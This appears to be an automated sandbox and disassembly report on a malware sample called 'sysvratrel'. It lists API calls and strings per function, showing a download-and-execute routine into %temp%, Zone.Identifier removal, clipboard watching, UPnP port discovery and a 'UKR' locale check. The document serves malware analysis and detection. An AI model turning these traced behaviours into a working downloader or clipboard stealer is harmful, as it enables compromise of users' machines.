Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
String ID:
API String ID: 1603358586-0
Opcode ID: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
Instruction ID: df8ad55f307143f3a92c653802a821764c0c55d7be8f2a3f3e8fe1ebc27bb844
Opcode Fuzzy Hash: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
Instruction Fuzzy Hash: 3F41AF70640701ABD3309F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E845875A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D950 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
htons.WS2_32(0000076C), ref: 0040D9A0
inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD

Part of subcall function 0040ACC0: htons.WS2_32(00000050), ref: 0040ACED
Part of subcall function 0040ACC0: socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
Part of subcall function 0040ACC0: connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
Part of subcall function 0040ACC0: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58

bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45

Part of subcall function 0040DAD0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
Part of subcall function 0040DAD0: Sleep.KERNEL32(000003E8), ref: 0040DB2E
Part of subcall function 0040DAD0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
Part of subcall function 0040DAD0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
Part of subcall function 0040DAD0: StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E

Strings

239.255.255.250, xrefs: 0040D9AA

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
String ID: 239.255.255.250
API String ID: 726339449-2186272203
Opcode ID: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
Instruction ID: 776be564c15d3a67ad3e8e206458624d982b0507424591c965b87a75806c6374
Opcode Fuzzy Hash: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
Instruction Fuzzy Hash: 1541E9B4E04208ABDB14DFE4D889BEEBBB5AF48304F108169E505B7390E7B55A44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
htons.WS2_32(?), ref: 00401508
setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
Instruction ID: 9f6d7f02e8121356806164c5164031e4b64ed467ed2b657d4572fa9387097a74
Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
Instruction Fuzzy Hash: E131C871A44301AFE320DF649C46F9BB6E0AF48B10F40493DF695EB2E0D3B5D544879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF30 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040CF42
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CF68
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CF9F
GetTickCount.KERNEL32 ref: 0040CFB4
Sleep.KERNEL32(00000001), ref: 0040CFD4
GetTickCount.KERNEL32 ref: 0040CFDA

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
Instruction ID: 1a678e6439685295adbdd864bb1f175a680e3ab9afc47d2c7bf7927640be176d
Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
Instruction Fuzzy Hash: B031FE7490020EEFCF04DFA4D988AEE77B1FF44315F108669E815A72D0D7749A90CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040ACED

Part of subcall function 0040AC80: inet_addr.WS2_32(0040AD01), ref: 0040AC8A
Part of subcall function 0040AC80: gethostbyname.WS2_32(?), ref: 0040AC9D

socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58

Strings

www.update.microsoft.com, xrefs: 0040ACF7

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
Instruction ID: ba3e2b0e6fec23725a126dc2d5d77dfcfe6771dbae9c9e174257d4c79807ff88
Opcode Fuzzy Hash: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
Instruction Fuzzy Hash: BA210BB5E103099BDB04DFF8D946AEEBBB5AF08300F108169E515F7390E7745A44CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(~|@,00000000,00000000,00000001,F0000040,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0D3
CryptGenRandom.ADVAPI32(~|@,?,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0E9
CryptReleaseContext.ADVAPI32(~|@,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0F5

Strings

~|@, xrefs: 0040C0CF, 0040C0E5, 0040C0F1, 0040C0D2, 0040C0E8, 0040C0F4

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: ~|@
API String ID: 1815803762-1417210658
Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
Instruction ID: 64b452c5f04e5b6757705d6885a7ff86aea398e2a213dd3f660bad642ac62f97
Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
Instruction Fuzzy Hash: F6E01275654208FBDB24CFD5EC49FDA776CAB48700F108154F709A7190DAB5EA40DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
Instruction ID: 53638d0e5b86ff224420f1c7f9a69720ea7b841d4339b56c2ae1fb68745f7462
Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
Instruction Fuzzy Hash: CA11B974A40710AFE360DF749C0AF877AE0AF04B14F50892DF599E72E1E3F49544878A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075B8), ref: 0040E983
strcmp.NTDLL ref: 0040E992

Strings

UKR, xrefs: 0040E989

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
Instruction ID: aa0b77ea91eb2b23b28eec9c342f5ca45138d15d753f47792771d9b4db2dab4a
Opcode Fuzzy Hash: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
Instruction Fuzzy Hash: FEE0C272A4430876DA10A6A1AE03BAA771C5F11701F000076AF04A61C1E9B9962992DB

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED20 Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 235
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040ED29
srand.MSVCRT ref: 0040ED30
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040ED50
strlen.NTDLL ref: 0040ED5A
mbstowcs.NTDLL ref: 0040ED71
rand.MSVCRT ref: 0040ED79
rand.MSVCRT ref: 0040ED8D
wsprintfW.USER32 ref: 0040EDB4
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EDCA
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EDF9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EE28
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EE5B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EE8C
CloseHandle.KERNEL32(000000FF), ref: 0040EE9B
wsprintfW.USER32 ref: 0040EEB4
DeleteFileW.KERNEL32(?), ref: 0040EEC4
Sleep.KERNEL32(000003E8), ref: 0040EECF
Sleep.KERNEL32(000007D0), ref: 0040EEF0
ExitProcess.KERNEL32 ref: 0040EF18
DeleteFileW.KERNEL32(?), ref: 0040EF2E
CloseHandle.KERNEL32(000000FF), ref: 0040EF3B
InternetCloseHandle.WININET(00000000), ref: 0040EF48
InternetCloseHandle.WININET(00000000), ref: 0040EF55
Sleep.KERNEL32(000003E8), ref: 0040EF60
rand.MSVCRT ref: 0040EF75
Sleep.KERNEL32 ref: 0040EF8C
rand.MSVCRT ref: 0040EF92
rand.MSVCRT ref: 0040EFA6
wsprintfW.USER32 ref: 0040EFCD
DeleteUrlCacheEntryW.WININET(?), ref: 0040EFDD
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040EFF7
wsprintfW.USER32 ref: 0040F017
DeleteFileW.KERNEL32(?), ref: 0040F027
Sleep.KERNEL32(000003E8), ref: 0040F032
Sleep.KERNEL32(000007D0), ref: 0040F053
ExitProcess.KERNEL32 ref: 0040F07A
DeleteFileW.KERNEL32(?), ref: 0040F089

Strings

%s:Zone.Identifier, xrefs: 0040F00B
%s\%d%d.exe, xrefs: 0040EDA8
%s:Zone.Identifier, xrefs: 0040EEA8
%s\%d%d.exe, xrefs: 0040EFC1
%temp%, xrefs: 0040ED4B
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EDC5

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
API String ID: 3526668077-2417596247
Opcode ID: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
Instruction ID: ad06c6bce1eeec4b269cf6b178fa0be949fbab599c126aebf23d2838ae6487db
Opcode Fuzzy Hash: ddf9ac5ed83cf9badb19a381914167fc1d390300ce8058f702f4e9ba32742620
Instruction Fuzzy Hash: 8291EBB1940318ABE720DB61DC49FEA3379BB88701F0484B9F209A51C1DAB99AD4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B010: gethostname.WS2_32(?,00000100), ref: 0040B02C
Part of subcall function 0040B010: gethostbyname.WS2_32(?), ref: 0040B03E

strcmp.NTDLL ref: 0040B110

Strings

.127, xrefs: 0040B13F
127., xrefs: 0040B121
.192., xrefs: 0040B1BC
.10, xrefs: 0040B1FD
0.0.0.0, xrefs: 0040B0FE
192., xrefs: 0040B180
.127., xrefs: 0040B15D
.192, xrefs: 0040B19E
10., xrefs: 0040B1DF
.10., xrefs: 0040B21B

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
Instruction ID: 14285435020103c943bf7af990fcf7992b9b4842fd13eaff794dfd4de82f65c2
Opcode Fuzzy Hash: 7f461de13bc063d15ec1264cc637e4dc2b0045e98767113049a7a1e9a29443f4
Instruction Fuzzy Hash: 5061A3B5904304A7DB10EF65DC4AAAE3B74AB50348F14843AEC05773D2E73DEA54C69E

Uniqueness

Uniqueness Score: -1.00%

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

PCOI, xrefs: 0040198A
ilci, xrefs: 004019E1

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
Instruction ID: 30acf59a4b92f93f505059f31b2171fe0b1c4ce4dbffa3032f64cc39e79a13a9
Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
Instruction Fuzzy Hash: E241F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040E730 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040E758
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E7A8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E7BB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F4
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E82A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E855
HttpSendRequestA.WININET(00000000,00411DE8,000000FF,00009E34), ref: 0040E87F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E8BE
memcpy.NTDLL(00000000,?,00000000), ref: 0040E910
InternetCloseHandle.WININET(00000000), ref: 0040E941
InternetCloseHandle.WININET(00000000), ref: 0040E94E
InternetCloseHandle.WININET(00000000), ref: 0040E95B

Strings

<, xrefs: 0040E760
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040E7B6
POST, xrefs: 0040E81E

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
Instruction ID: 85fc693ee375b13e16fb66d1006c55e21916babb9bf1ea115f780426e1cf3f13
Opcode Fuzzy Hash: 4c841f94eea498a124c4035f34500e71f511402468c94ca26de25d70c5934535
Instruction Fuzzy Hash: C6513DB5A01228ABDB66CF54CC54BDA73BCAB48705F0481E9B60DA6280D7B86FC4CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040591C
SetClipboardViewer.USER32(?), ref: 00405968
SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
OpenClipboard.USER32(00000000), ref: 00405A17
GetClipboardData.USER32(00000000), ref: 00405A29
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
ChangeClipboardChain.USER32(?,?), ref: 00405B3E
DefWindowProcA.USER32(?,?,?,?), ref: 00405B54

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
Instruction ID: e885106aa0884b4502b2237862738d0df8f48eeaae93079a212bc481fb1f7e33
Opcode Fuzzy Hash: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
Instruction Fuzzy Hash: E771FC75A00608EFDF14DFA4D988BAFB7B4EB48300F14856AE506B6290D7799A40CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

PCOI, xrefs: 0040160D
ilci, xrefs: 00401630

Memory Dump Source

Source File: 00000008.00000002.2460138029.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2460124791.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2460168772.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_sysvratrel.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
Instruction ID: 6a29a2099ab565f473fc8e7e311d0e2c8013c240518d5c358219ad3f6c04db59
Opcode Fuzzy Hash: 1a1d8dd466f73ad32925f591319fce38dcb0625be9ff5656726825d3c16979f1
Instruction Fuzzy Hash: C231A675900701ABC720DF70EC48B97B7A8BF08304F048A2AF559A3691D77AF894CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405820 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00405838
GetModuleHandleW.KERNEL32(00000000), ref: 00405850
Sleep.KERNEL32(00000001), ref: 00405864
GetTickCount.KERNEL32 ref: 0040586A
GetTickCount.KERNEL32 ref: 00405873
wsprintfW.USER32 ref: 00405886
RegisterClassExW.USER32(00000030), ref: 00405893
